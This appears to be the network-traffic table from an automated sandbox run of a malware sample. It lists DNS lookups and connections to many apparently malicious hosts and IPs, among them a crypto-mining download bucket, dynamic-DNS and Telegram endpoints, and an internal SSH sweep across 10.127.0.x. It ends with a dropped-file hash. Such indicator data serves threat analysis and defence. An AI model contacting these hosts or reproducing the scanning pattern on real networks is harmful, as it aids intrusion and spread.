| CN | 116.169.181.197:80 | d.kpzip.com | tcp |
| US | 8.8.8.8:53 | 181.63.239.18.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| US | 8.8.8.8:53 | ad.adf6.com | udp |
| US | 192.74.234.120:80 | ad.adf6.com | tcp |
| VN | 103.216.119.164:80 | quanlyphongnet.com | tcp |
| US | 8.8.8.8:53 | 248.62.90.154.in-addr.arpa | udp |
| US | 72.219.74.233:8080 | 72.219.74.233 | tcp |
| NL | 185.202.113.6:80 | 185.202.113.6 | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| CN | 47.98.177.117:8888 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| TH | 58.9.110.23:18063 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 233.74.219.72.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | httpbin.org | udp |
| US | 18.208.8.205:443 | httpbin.org | tcp |
| US | 8.8.8.8:53 | 205.8.208.18.in-addr.arpa | udp |
| TH | 154.197.69.165:80 | 154.197.69.165 | tcp |
| CN | 52.83.32.119:8899 | tcp | |
| CN | 119.167.70.110:13332 | tcp | |
| MA | 102.53.15.54:80 | 102.53.15.54 | tcp |
| NL | 18.239.63.19:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| AU | 110.143.54.213:80 | 110.143.54.213 | tcp |
| US | 8.8.8.8:53 | utorrent-servers.xyz | udp |
| CN | 123.117.136.97:9000 | tcp | |
| CN | 118.178.133.241:65500 | tcp | |
| KR | 27.102.130.169:801 | 27.102.130.169 | tcp |
| PE | 161.132.57.101:80 | www.grupodulcemar.pe | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 54.15.53.102.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.63.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.69.197.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.54.143.110.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| JP | 126.23.203.236:80 | softbank126023203236.bbtec.net | tcp |
| US | 8.8.8.8:53 | update.itopvpn.com | udp |
| N/A | 192.168.2.15:443 | tcp | |
| US | 8.8.8.8:53 | home.fvtekx5pt.top | udp |
| GB | 89.197.154.115:7700 | tcp | |
| GB | 34.105.155.9:80 | home.fvtekx5pt.top | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| RU | 89.175.186.155:80 | 89.175.186.155 | tcp |
| CN | 39.103.150.56:8888 | tcp | |
| US | 8.8.8.8:53 | www.opolis.io | udp |
| US | 8.8.8.8:53 | cs.go.kg | udp |
| NL | 194.26.192.76:8080 | 194.26.192.76 | tcp |
| US | 81.28.12.12:80 | utorrent-servers.xyz | tcp |
| PL | 152.199.23.214:80 | update.itopvpn.com | tcp |
| US | 8.8.8.8:53 | 214.23.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.155.105.34.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| CN | 101.226.27.115:80 | by.haory.cn | tcp |
| US | 204.9.23.122:85 | 204.9.23.122 | tcp |
| US | 8.8.8.8:53 | 12.12.28.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.23.9.204.in-addr.arpa | udp |
| KG | 176.126.167.7:80 | cs.go.kg | tcp |
| AT | 195.26.206.107:80 | www.opolis.io | tcp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| US | 8.8.8.8:53 | 7.167.126.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.186.175.89.in-addr.arpa | udp |
| TH | 58.137.135.190:8080 | tcp | |
| JP | 64.176.38.237:8139 | tcp | |
| US | 8.8.8.8:53 | home.fvtekx5pt.top | udp |
| US | 8.8.8.8:53 | 76.192.26.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.206.26.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.135.137.58.in-addr.arpa | udp |
| GB | 34.105.155.9:80 | home.fvtekx5pt.top | tcp |
| US | 8.8.8.8:53 | home.fvtekx5pt.top | udp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| CN | 123.6.40.224:80 | stdown.dinju.com | tcp |
| CN | 116.162.169.61:80 | mininews.kpzip.com | tcp |
| GB | 34.105.155.9:80 | home.fvtekx5pt.top | tcp |
| NL | 18.239.63.217:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| NL | 31.214.157.124:443 | tcp | |
| JP | 64.176.38.237:443 | tcp | |
| CN | 114.215.27.238:14417 | tcp | |
| TR | 5.26.97.52:80 | tcp | |
| CN | 119.91.25.19:8888 | tcp | |
| HK | 103.73.160.35:80 | tcp | |
| US | 104.21.8.89:80 | down.mvip8.ru | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 98.109.126.66:41798 | tcp | |
| US | 8.8.8.8:53 | znrq.zifwxq.cn | udp |
| VN | 14.243.221.170:2654 | tcp | |
| RU | 185.215.113.66:80 | eoufaoeuhoauengi.su | tcp |
| NL | 18.239.63.64:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.net | udp |
| TN | 41.230.16.223:8889 | tcp | |
| TH | 45.141.26.180:80 | tcp | |
| US | 8.8.8.8:53 | 230.188.166.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| KR | 211.220.36.213:80 | tcp | |
| CN | 218.12.76.159:80 | tcp | |
| RU | 83.149.17.194:80 | tcp | |
| US | 8.8.8.8:53 | sirault.be | udp |
| US | 8.8.8.8:53 | 194.17.149.83.in-addr.arpa | udp |
| CN | 36.250.242.248:80 | d.kpzip.com | tcp |
| CN | 61.160.192.121:80 | tcp | |
| US | 166.166.188.230:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 19.129.122.134.in-addr.arpa | udp |
| KR | 203.232.37.151:80 | tcp | |
| FR | 185.98.131.200:443 | sirault.be | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 70.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| HK | 134.122.129.19:80 | tcp | |
| CN | 60.29.43.10:8072 | tcp | |
| US | 8.8.8.8:53 | 64.78.102.34.in-addr.arpa | udp |
| CN | 123.6.40.224:80 | stdown.dinju.com | tcp |
| CN | 222.186.172.42:1000 | tcp | |
| VN | 103.167.89.125:80 | 103.167.89.125 | tcp |
| US | 8.8.8.8:53 | udp | |
| CN | 222.186.172.42:1000 | tcp | |
| US | 8.8.8.8:53 | udp | |
| GB | 89.197.154.115:7700 | tcp | |
| US | 8.8.8.8:53 | rl.ammyy.com | udp |
| NL | 188.42.129.148:80 | rl.ammyy.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | c3poolbat.oss-accelerate.aliyuncs.com | udp |
| HK | 154.12.82.11:808 | tcp | |
| DE | 136.243.104.235:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| HK | 154.12.82.11:7878 | tcp | |
| CN | 203.2.65.29:8086 | tcp | |
| CN | 112.33.27.73:443 | tcp | |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| VN | 103.77.173.146:6606 | ser.nrovn.xyz | tcp |
| CN | 101.226.27.114:80 | by.haory.cn | tcp |
| US | 34.102.78.64:9002 | 34.102.78.64 | tcp |
| US | 8.8.8.8:53 | up.maolaoban.top | udp |
| US | 8.8.8.8:53 | www.ammyy.com | udp |
| DE | 136.243.18.118:80 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| US | 8.8.8.8:53 | cs.go.kg | udp |
| KG | 176.126.167.7:80 | cs.go.kg | tcp |
| KG | 176.126.167.7:80 | cs.go.kg | tcp |
| US | 8.8.8.8:53 | 118.18.243.136.in-addr.arpa | udp |
| CN | 116.131.57.66:80 | stdown.dinju.com | tcp |
| CN | 58.144.248.111:80 | mininews.kpzip.com | tcp |
| CN | 121.40.100.23:12616 | tcp | |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.135.105:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 105.135.221.88.in-addr.arpa | udp |
| BE | 78.20.115.5:80 | 78.20.115.5 | tcp |
| US | 185.199.110.133:443 | media.githubusercontent.com | tcp |
| RU | 185.215.113.66:80 | deauduafzgezzfgm.top | tcp |
| CN | 122.228.207.55:80 | tcp | |
| KR | 146.56.118.137:80 | 146.56.118.137 | tcp |
| US | 8.8.8.8:53 | cfs7.blog.daum.net | udp |
| US | 8.8.8.8:53 | download.haozip.com | udp |
| GB | 89.197.154.115:7700 | tcp | |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.115.20.78.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.118.56.146.in-addr.arpa | udp |
| KG | 176.126.167.7:80 | cs.go.kg | tcp |
| KG | 176.126.167.7:80 | cs.go.kg | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 66.63.187.231:80 | 66.63.187.231 | tcp |
| TH | 171.100.81.38:8080 | 171.100.81.38 | tcp |
| CN | 116.131.57.65:80 | stdown.dinju.com | tcp |
| TH | 58.9.110.23:18063 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | adv.gamer.kg | udp |
| KG | 176.126.167.7:80 | adv.gamer.kg | tcp |
| KG | 176.126.167.7:80 | adv.gamer.kg | tcp |
| RU | 185.215.113.66:80 | deauduafzgezzfgm.top | tcp |
| CN | 61.182.69.190:11111 | tcp | |
| GB | 8.208.41.172:80 | c3poolbat.oss-accelerate.aliyuncs.com | tcp |
| RU | 193.233.48.194:80 | 193.233.48.194 | tcp |
| KG | 176.126.167.7:80 | adv.gamer.kg | tcp |
| US | 8.8.8.8:53 | udp | |
| N/A | 172.64.149.23:80 | tcp | |
| US | 8.8.8.8:53 | 172.41.208.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| HK | 154.201.87.30:8888 | 154.201.87.30 | tcp |
| US | 158.101.35.62:9000 | 158.101.35.62 | tcp |
| DE | 185.232.59.135:80 | up.maolaoban.top | tcp |
| SG | 168.138.162.78:80 | 168.138.162.78 | tcp |
| GB | 142.250.200.3:80 | o.pki.goog | tcp |
| VN | 14.243.221.170:2654 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 135.59.232.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.35.101.158.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.162.138.168.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| CN | 180.163.148.214:80 | download.haozip.com | tcp |
| KR | 121.53.202.238:80 | cfs7.blog.daum.net | tcp |
| CN | 61.160.192.114:80 | tcp | |
| CN | 120.52.95.247:80 | tcp | |
| AT | 81.10.240.105:80 | 81.10.240.105 | tcp |
| VN | 103.110.33.188:80 | 103.110.33.188 | tcp |
| CN | 47.104.233.213:8072 | tcp | |
| US | 66.63.187.231:80 | 66.63.187.231 | tcp |
| DE | 185.254.96.92:80 | 185.254.96.92 | tcp |
| US | 8.8.8.8:53 | karoonpc.com | udp |
| US | 8.8.8.8:53 | desquer.ens.uabc.mx | udp |
| US | 8.8.8.8:53 | 238.202.53.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.96.254.185.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| VN | 103.77.173.146:6606 | ser.nrovn.xyz | tcp |
| US | 8.8.8.8:53 | 188.33.110.103.in-addr.arpa | udp |
| RS | 79.101.0.33:80 | 79.101.0.33 | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | cfs5.tistory.com | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| TH | 58.9.110.23:18063 | tcp | |
| GB | 89.197.154.115:7700 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| SE | 129.151.210.233:8000 | 129.151.210.233 | tcp |
| KR | 125.186.91.61:80 | 125.186.91.61 | tcp |
| US | 8.8.8.8:53 | elisans.novayonetim.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| US | 8.8.8.8:53 | 233.210.151.129.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.91.186.125.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.240.10.81.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CN | 112.124.28.233:5566 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | armanayegh.com | udp |
| CN | 223.247.198.16:14319 | tcp | |
| IR | 217.172.98.87:80 | karoonpc.com | tcp |
| MX | 148.231.192.3:80 | desquer.ens.uabc.mx | tcp |
| KR | 211.231.99.68:80 | cfs5.tistory.com | tcp |
| US | 8.8.8.8:53 | 252.215.42.69.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.18.38.233:80 | tcp | |
| VN | 103.216.119.164:80 | quanlyphongnet.com | tcp |
| HK | 154.12.82.11:808 | 154.12.82.11 | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| RU | 45.90.34.133:443 | pb.agnt.ru | tcp |
| TR | 176.53.14.120:80 | elisans.novayonetim.com | tcp |
| US | 8.8.8.8:53 | noithaticon.vn | udp |
| US | 8.8.8.8:53 | 87.98.172.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.192.231.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.99.231.211.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| N/A | 10.127.0.1:22 | tcp | |
| N/A | 10.127.0.10:22 | tcp | |
| GB | 8.208.41.172:80 | c3poolbat.oss-accelerate.aliyuncs.com | tcp |
| N/A | 10.127.0.2:22 | tcp | |
| N/A | 10.127.0.6:22 | tcp | |
| N/A | 10.127.0.7:22 | tcp | |
| N/A | 10.127.0.5:22 | tcp | |
| N/A | 10.127.0.4:22 | tcp | |
| N/A | 10.127.0.8:22 | tcp | |
| PT | 188.250.120.10:80 | 188.250.120.10 | tcp |
| US | 103.130.147.211:80 | 103.130.147.211 | tcp |
| US | 8.8.8.8:53 | jtpdev.co.uk | udp |
| CN | 8.130.82.167:80 | tcp | |
| US | 8.8.8.8:53 | monastery.mlnk.net | udp |
| US | 8.8.8.8:53 | api.52kkg.com | udp |
| US | 8.8.8.8:53 | twizt.net | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 20.83.148.22:80 | tcp | |
| VN | 103.216.119.164:80 | quanlyphongnet.com | tcp |
| US | 8.8.8.8:53 | udp | |
| N/A | 10.127.0.3:22 | tcp | |
| N/A | 10.127.0.9:22 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 10.120.250.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.147.130.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.57.26.184.in-addr.arpa | udp |
| GB | 89.197.154.115:7700 | tcp | |
| N/A | 10.127.0.15:22 | tcp | |
| N/A | 10.127.0.20:22 | tcp | |
| N/A | 10.127.0.11:22 | tcp | |
| N/A | 10.127.0.12:22 | tcp | |
| N/A | 10.127.0.18:22 | tcp | |
| N/A | 10.127.0.16:22 | tcp | |
| N/A | 10.127.0.19:22 | tcp | |
| N/A | 10.127.0.14:22 | tcp | |
| N/A | 10.127.0.17:22 | tcp | |
| N/A | 10.127.0.13:22 | tcp | |
| US | 8.8.8.8:53 | 154.141.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| BE | 74.125.206.84:443 | accounts.google.com | tcp |
| GB | 8.208.41.172:80 | c3poolbat.oss-accelerate.aliyuncs.com | tcp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 154.216.20.237:80 | 154.216.20.237 | tcp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.206.125.74.in-addr.arpa | udp |
| IR | 185.94.96.102:80 | armanayegh.com | tcp |
| N/A | 10.127.0.29:22 | tcp | |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| N/A | 10.127.0.25:22 | tcp | |
| GB | 216.58.212.227:443 | update.googleapis.com | tcp |
| N/A | 10.127.0.22:22 | tcp | |
| N/A | 10.127.0.24:22 | tcp | |
| N/A | 10.127.0.23:22 | tcp | |
| N/A | 10.127.0.26:22 | tcp | |
| N/A | 10.127.0.21:22 | tcp | |
| N/A | 10.127.0.28:22 | tcp | |
| N/A | 10.127.0.30:22 | tcp | |
| N/A | 10.127.0.27:22 | tcp | |
| TH | 154.197.69.165:7000 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| CN | 101.226.27.113:80 | by.haory.cn | tcp |
| KR | 221.143.49.222:80 | 221.143.49.222 | tcp |
| KR | 152.67.212.187:443 | tcp | |
| US | 8.8.8.8:53 | 102.96.94.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.49.143.221.in-addr.arpa | udp |
| GB | 8.208.41.172:80 | c3poolbat.oss-accelerate.aliyuncs.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| GB | 216.58.212.227:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | 187.212.67.152.in-addr.arpa | udp |
| N/A | 10.127.0.34:22 | tcp | |
| N/A | 10.127.0.35:22 | tcp | |
| N/A | 10.127.0.33:22 | tcp | |
| N/A | 10.127.0.39:22 | tcp | |
| N/A | 10.127.0.32:22 | tcp | |
| CN | 123.6.40.248:80 | stdown.dinju.com | tcp |
| CN | 119.167.229.190:80 | mininews.kpzip.com | tcp |
| VN | 103.221.220.14:443 | noithaticon.vn | tcp |
| US | 8.8.8.8:53 | ini.sh-pp.com | udp |
| CN | 121.43.104.75:81 | tcp | |
| N/A | 10.127.0.37:22 | tcp | |
| N/A | 10.127.0.40:22 | tcp | |
| N/A | 10.127.0.38:22 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| N/A | 10.127.0.31:22 | tcp | |
| N/A | 10.127.0.36:22 | tcp | |
| GB | 89.197.154.115:7700 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| CN | 183.60.150.17:80 | tcp | |
| RU | 176.113.115.178:80 | 176.113.115.178 | tcp |
| GB | 91.238.160.241:80 | jtpdev.co.uk | tcp |
| BG | 88.213.212.10:80 | monastery.mlnk.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 194.147.99.181:80 | api.52kkg.com | tcp |
| CN | 47.108.236.50:8090 | tcp | |
| US | 8.8.8.8:53 | downsexv.com | udp |
| CN | 61.240.220.214:80 | stdown.dinju.com | tcp |
| US | 8.8.8.8:53 | 14.220.221.103.in-addr.arpa | udp |
| KR | 152.67.212.187:443 | tcp | |
| GB | 8.208.41.172:80 | c3poolbat.oss-accelerate.aliyuncs.com | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 241.160.238.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.212.213.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.99.147.194.in-addr.arpa | udp |
| N/A | 10.127.0.44:22 | tcp | |
| N/A | 10.127.0.49:22 | tcp | |
| N/A | 10.127.0.43:22 | tcp | |
| N/A | 10.127.0.42:22 | tcp | |
| N/A | 10.127.0.46:22 | tcp | |
| N/A | 10.127.0.45:22 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| N/A | 10.127.0.47:22 | tcp | |
| N/A | 104.18.38.233:80 | tcp | |
| N/A | 10.127.0.41:22 | tcp | |
| N/A | 10.127.0.48:22 | tcp | |
| N/A | 10.127.0.50:22 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| JP | 111.217.175.54:80 | 111.217.175.54 | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 54.175.217.111.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| CN | 117.72.70.169:80 | tcp | |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| N/A | 10.127.0.57:22 | tcp | |
| N/A | 10.127.0.53:22 | tcp | |
| N/A | 10.127.0.55:22 | tcp | |
| N/A | 10.127.0.51:22 | tcp | |
| N/A | 10.127.0.58:22 | tcp | |
| N/A | 10.127.0.52:22 | tcp | |
| VN | 14.243.221.170:2654 | tcp | |
| N/A | 10.127.0.54:22 | tcp | |
| US | 8.8.8.8:53 | 33.207.178.68.in-addr.arpa | udp |
| N/A | 10.127.0.59:22 | tcp | |
| N/A | 10.127.0.56:22 | tcp | |
| TH | 58.9.110.23:18063 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| N/A | 10.127.0.60:22 | tcp | |
| CN | 180.163.148.218:80 | download.haozip.com | tcp |
| CN | 61.160.192.117:80 | tcp | |
| CN | 218.12.76.158:80 | tcp | |
| GB | 89.197.154.115:7700 | tcp | |
| CN | 47.101.28.200:80 | ini.sh-pp.com | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| N/A | 10.127.0.63:22 | tcp | |
| N/A | 10.127.0.61:22 | tcp | |
| SG | 158.140.133.56:8090 | 158.140.133.56 | tcp |
| KR | 183.115.102.3:80 | tcp | |
| US | 166.167.172.14:8240 | 166.167.172.14 | tcp |
| US | 8.8.8.8:53 | data.yhydl.com | udp |
| DE | 172.105.66.118:80 | 172-105-66-118.ip.linodeusercontent.com | tcp |
| US | 172.67.189.30:80 | downsexv.com | tcp |
| N/A | 10.127.0.68:22 | tcp | |
| N/A | 10.127.0.64:22 | tcp | |
| N/A | 10.127.0.66:22 | tcp | |
| N/A | 10.127.0.65:22 | tcp | |
| N/A | 10.127.0.62:22 | tcp | |
| N/A | 10.127.0.67:22 | tcp | |
| N/A | 10.127.0.70:22 | tcp | |
| US | 8.8.8.8:53 | 30.189.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.133.140.158.in-addr.arpa | udp |
| N/A | 10.127.0.69:22 | tcp | |
| PL | 185.241.208.156:80 | 185.241.208.156 | tcp |
| AT | 91.142.27.138:80 | 91.142.27.138 | tcp |
| ES | 47.62.190.226:80 | 47.62.190.226 | tcp |
| VN | 103.77.173.146:7707 | ser.nrovn.xyz | tcp |
| US | 8.8.8.8:53 | 156.208.241.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.27.142.91.in-addr.arpa | udp |
| N/A | 10.127.0.74:22 | tcp | |
| N/A | 10.127.0.71:22 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| N/A | 10.127.0.73:22 | tcp | |
| N/A | 10.127.0.76:22 | tcp | |
| N/A | 10.127.0.72:22 | tcp | |
| N/A | 10.127.0.75:22 | tcp | |
| N/A | 10.127.0.77:22 | tcp | |
| N/A | 10.127.0.78:22 | tcp | |
| N/A | 10.127.0.79:22 | tcp | |
| N/A | 10.127.0.80:22 | tcp | |
| IE | 185.166.142.22:443 | bitbucket.org | tcp |
| TH | 147.50.240.62:80 | 147.50.240.62 | tcp |
| CN | 112.5.156.15:20006 | data.yhydl.com | tcp |
| US | 8.8.8.8:53 | files5.uludagbilisim.com | udp |
| IN | 103.117.156.102:80 | 103.117.156.102 | tcp |
| HK | 143.92.62.107:80 | 143.92.62.107 | tcp |
| VE | 167.250.49.155:80 | 167.250.49.155 | tcp |
| US | 8.8.8.8:53 | www.medises.co.kr | udp |
| US | 8.8.8.8:53 | 22.142.166.185.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| N/A | 10.127.0.88:22 | tcp | |
| N/A | 10.127.0.83:22 | tcp | |
| N/A | 10.127.0.87:22 | tcp | |
| US | 8.8.8.8:53 | 62.240.50.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.156.117.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.49.250.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.62.92.143.in-addr.arpa | udp |
| N/A | 10.127.0.82:22 | tcp | |
| N/A | 10.127.0.84:22 | tcp | |
| N/A | 10.127.0.86:22 | tcp | |
| N/A | 10.127.0.85:22 | tcp | |
| N/A | 10.127.0.81:22 | tcp | |
| US | 8.8.8.8:53 | panpoppo-25611.portmap.io | udp |
| DE | 172.105.66.118:8080 | 172-105-66-118.ip.linodeusercontent.com | tcp |
| DE | 193.161.193.99:25611 | panpoppo-25611.portmap.io | tcp |
| N/A | 10.127.0.90:22 | tcp | |
| N/A | 10.127.0.89:22 | tcp | |
| GB | 89.197.154.115:7700 | tcp | |
| CN | 39.105.31.193:1389 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| N/A | 10.127.0.98:22 | tcp | |
| N/A | 10.127.0.91:22 | tcp | |
| N/A | 10.127.0.95:22 | tcp | |
| N/A | 10.127.0.93:22 | tcp | |
| CN | 61.131.3.86:9991 | tcp | |
| DE | 85.22.139.189:80 | 85.22.139.189 | tcp |
| N/A | 10.127.0.94:22 | tcp | |
| N/A | 10.127.0.100:22 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| N/A | 10.127.0.99:22 | tcp | |
| N/A | 10.127.0.96:22 | tcp | |
| US | 8.8.8.8:53 | 189.139.22.85.in-addr.arpa | udp |
| N/A | 10.127.0.97:22 | tcp | |
| N/A | 10.127.0.92:22 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| RU | 176.113.115.178:80 | 176.113.115.178 | tcp |
| RU | 176.113.115.178:80 | 176.113.115.178 | tcp |
| CN | 101.226.27.111:80 | by.haory.cn | tcp |
| CN | 116.62.242.43:80 | tcp | |
| NL | 185.202.113.6:80 | tcp | |
| TR | 46.20.5.15:80 | files5.uludagbilisim.com | tcp |
| CN | 61.160.195.64:80 | 139520.aioc.qbgxl.com | tcp |
| KR | 114.201.95.60:80 | www.medises.co.kr | tcp |
| KR | 27.102.130.169:801 | tcp | |
| CN | 36.110.15.211:9000 | tcp | |
| CN | 223.247.198.16:8072 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | 15.5.20.46.in-addr.arpa | udp |
| N/A | 10.127.0.105:22 | tcp | |
| N/A | 10.127.0.108:22 | tcp | |
| N/A | 10.127.0.101:22 | tcp | |
| N/A | 10.127.0.102:22 | tcp | |
| N/A | 10.127.0.103:22 | tcp | |
| N/A | 10.127.0.107:22 | tcp | |
| N/A | 10.127.0.106:22 | tcp | |
| N/A | 10.127.0.109:22 | tcp | |
| N/A | 10.127.0.104:22 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 60.95.201.114.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.seetrol.com | udp |
| US | 13.58.157.220:10640 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| N/A | 10.127.0.110:22 | tcp | |
| KR | 139.150.75.206:80 | www.seetrol.com | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 206.75.150.139.in-addr.arpa | udp |
| N/A | 10.127.0.113:22 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| N/A | 10.127.0.115:22 | tcp | |
| N/A | 10.127.0.114:22 | tcp | |
| N/A | 10.127.0.118:22 | tcp | |
| N/A | 10.127.0.111:22 | tcp | |
| N/A | 10.127.0.112:22 | tcp | |
| N/A | 10.127.0.116:22 | tcp | |
| N/A | 10.127.0.117:22 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI24682\python311.dll
| MD5 | 9a24c8c35e4ac4b1597124c1dcbebe0f |
